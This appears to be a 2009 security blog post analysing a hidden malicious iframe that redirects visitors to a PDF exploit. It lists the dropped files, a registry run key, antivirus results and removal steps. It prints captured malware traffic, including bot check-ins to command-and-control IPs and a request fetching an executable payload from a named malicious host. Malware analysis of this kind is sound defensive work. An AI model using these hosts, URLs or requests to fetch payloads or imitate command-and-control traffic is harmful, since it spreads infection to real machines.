An user submitted to us a suspicious link that was present in his website as an hidden iframe.
Malicious hidden iframes are mainly inserted in html pages of legit websites by bad hackers that want to spread their malware with the objective to infect all the users that will visit the compromised website and in most of the cases, is possible that the hackers have infected the entire files of the website or they have installed a malicious url redirect to other websites with installed other exploits for common used web browsers.
The website could be compromised by the bad hacker because:
1) You website contains scripts that are vulnerable to RFI/SQL/XSS/LFI/RCE/etc.
2) Your website is hosted in a shared-host and if an hacker has compromise one website hosted in the same cluster where is hosted your website then the hacker can infect ALL the websites present (your included).
Now lets see what would be happened if you had visited the infected website with the hidden malicious iframe.
The malicious hidden iframe looks like:
After I browsed the malicious url I was redirected to another website that contains a PDF Exploit:
Traffic:
GET /in.cgi?cocacola46 HTTP/1.1
Host: litetopfindworld.cn
HTTP/1.1 302 FoundGET /index.php?cocacola46 HTTP/1.1
Host: ghrgt.hostindianet.com
HTTP/1.1 200 OK
Server: nginx/0.6.35
Content-Length: 6147
Below there is the exploit screenshot:
We can see that the exploit redirected my browser to:
cache/readme.pdf => Another iframe redirect
cache/flash.swf => Another iframe redirect
Were created various files in Temporary Internet Files related to the malicious urls:
After the execution of the files downloaded from the exploit, new files were created in my system:
C:\WINDOWS\system32\wbem\grpconv.exe
C:\WINDOWS\Temp\wpv331238107706.exe
C:\WINDOWS\Temp\wpv761238313566.exe
C:\WINDOWS\system32\crypts.dll
C:\Documents and Settings\user\user.exe
The file C:\Documents and Settings\user\user.exe had +H (Hidden) attribute and was hidden from explorer search.
The DLL file named crypts.dll was injected in explorer.exe and the file named user.exe created a new registry key to be able to startup everytime windows start:
HKCU\…\Run\user.exe
During the analysis, the malware established various connections with different domains and IPs:
94.247.3.152 (hs.3-152.zlkon.lv)
213.155.4.82 (N/A)
78.109.30.224 (reverse30-224.reserver.ru)
94.247.2.95 (hs.2-95.zlkon.lv)
68.180.151.74 (hansali4.com)
83.133.127.5 (.)
Traffic:
GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=xxx&rnd=xxx HTTP/1.1
Host: 213.155.4.82POST /good/receiver/online HTTP/1.1
Host: 78.109.30.224
Content-Length: 16
guid=xxxxxxGET /bt.php?mod=&id=xxx&up=xxx&mid=soboc42 HTTP/1.1
Host: af9f330a59.com
0SLP:3600;MOD:dAcbf6;URL:hxxp://hansali4.com/731l2.exe;SRV:stoped;GET /731l2.exe HTTP/1.1
Host: hansali4.comPOST /gate/gate.php HTTP/1.0
Host: mixmediadirect.cn194.8.74.51:443 => SSL Traffic
At the end, the malware started to establish connections with hotmail.com probably for spam messages to other emails or something similar:
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: hotmail.com
Connection: Keep-AliveHTTP/1.1 302 Redirected
Date: Sun, 29 Mar 2009 16:59:07 GMT
Server: Microsoft-IIS/6.0
Location: hxxp://lc1.bay0.hotmail.passport.com/cgi-bin/login
Report from the virus scanner:
Report Generated: 29.3.2009 at 19.57.41 (GMT 1)
Time for scan: 50 seconds
File Name: index[1].htm
File Size: 6 KB
MD5 Hash: 2F9467513FAE3071B8EC831857963340
SHA1 Hash: 59C6D7D70F529762FAD7408360E016D6C816EFB3
Detection Rate: 2 on 24 (8,33 %)
Status: INFECTED
Antivirus Sig version Engine Version Result
a-squared 29/03/2009 4.0.0.32 -
Avira AntiVir 7.1.2.228 8.1.2.12 -
Avast 090328-0 4.8.1229 -
AVG 270.11.31/2028 8.0.0.0 -
BitDefender 29/03/2009 7.0.0.2555 -
ClamAV 29/03/2009 0.93.1.0 -
Comodo 1087 3.8 -
Dr.Web 29/03/2009 5.0 -
Ewido 29/03/2009 4.0.0.2 -
F-PROT 6 20090328 4.4.4.56 JS/Psyme.IX
G DATA 19.3655 2.0.7309.847 -
IkarusT3 27/03/2009 1001044 -
Kaspersky 29/03/2009 8.0.0.357 Trojan-Downloader.JS.Agent.duy
McAfee 29/03/2009 5.1.0.0 -
Malware Hash Registry 29/03/2009 N/A -
NOD32 v3 3972 3.0.677 -
Norman 2009/03/27 5.92.08 -
Panda 07/02/2009 9.5.1.00 -
QuickHeal 28 March, 2009 10.0 -
Solo Antivirus 29/03/2009 8.0 -
Sophos 29/03/2009 4.32.0 -
TrendMicro 927(592700) 1.1-1001 -
VBA32 29/03/2009 3.12.0.300 -
VirusBuster 10.102.26 1.4.3 -
Report Generated: 29.3.2009 at 19.56.42 (GMT 1)
Time for scan: 46 seconds
File Name: 731l2[1].exe
File Size: 71 KB
MD5 Hash: 6E14662D9469DFC1E6387F9C5D00513A
SHA1 Hash: C0E8B584E105ACED2A4CE403EF77CB45B3987E45
Detection Rate: 17 on 24 (70,83 %)
Status: INFECTED
Antivirus Sig version Engine Version Result
a-squared 29/03/2009 4.0.0.32 -
Avira AntiVir 7.1.2.228 8.1.2.12 TR/Downloader.Gen
Avast 090328-0 4.8.1229 Win32:Trojan-gen {Other}
AVG 270.11.31/2028 8.0.0.0 Downloader.Generic8.ZVT
BitDefender 29/03/2009 7.0.0.2555 Trojan.Generic.1545891
ClamAV 29/03/2009 0.93.1.0 -
Comodo 1087 3.8 Backdoor.Win32.KeyStart.~A
Dr.Web 29/03/2009 5.0 Trojan.DownLoader.origin
Ewido 29/03/2009 4.0.0.2 -
F-PROT 6 20090328 4.4.4.56 -
G DATA 19.3655 2.0.7309.847 -
IkarusT3 27/03/2009 1001044 Backdoor.Win32.KeyStart
Kaspersky 29/03/2009 8.0.0.357 Backdoor.Win32.KeyStart.cb
McAfee 29/03/2009 5.1.0.0 Generic Downloader.x trojan
Malware Hash Registry 29/03/2009 N/A detect rate 74%
NOD32 v3 3972 3.0.677 Win32/TrojanDownloader.Agent.OWB
Norman 2009/03/27 5.92.08 Trojan W32/DLoader.KZPW
Panda 07/02/2009 9.5.1.00 -
QuickHeal 28 March, 2009 10.0 Backdoor.KeyStart.cb
Solo Antivirus 29/03/2009 8.0 Backdoor.Win32.KeyStart.CB
Sophos 29/03/2009 4.32.0 Sus/Spy-B
TrendMicro 927(592700) 1.1-1001 -
VBA32 29/03/2009 3.12.0.300 Backdoor.Win32.KeyStart.bz
VirusBuster 10.102.26 1.4.3 Backdoor.KeyStart.AD
What to do to remove the infection ?
Step 1: Clean the html pages
The first action that the system administrator needs to do is to remove from the HTML pages the malicious hidden iframe code and then check the logs and the code of installed php scripts to find the presence of possible vulnerable code.
Step 2: Remove the infected files
To remove the infected files from your system you need to:
1) Delete all created files, in my case:
C:\WINDOWS\system32\wbem\grpconv.exe
C:\WINDOWS\Temp\wpv331238107706.exe
C:\WINDOWS\Temp\wpv761238313566.exe
C:\WINDOWS\system32\crypts.dll
C:\Documents and Settings\user\user.exe
2) Delete the malicious registry key, in my case:
HKCU\…\Run\user.exe
3) Do a complete system scan with your Antivirus to detect other possible viruses installed in your computer.
4) Download, install and update NVT Malware Remover Tool and do a complete system scan of your computer.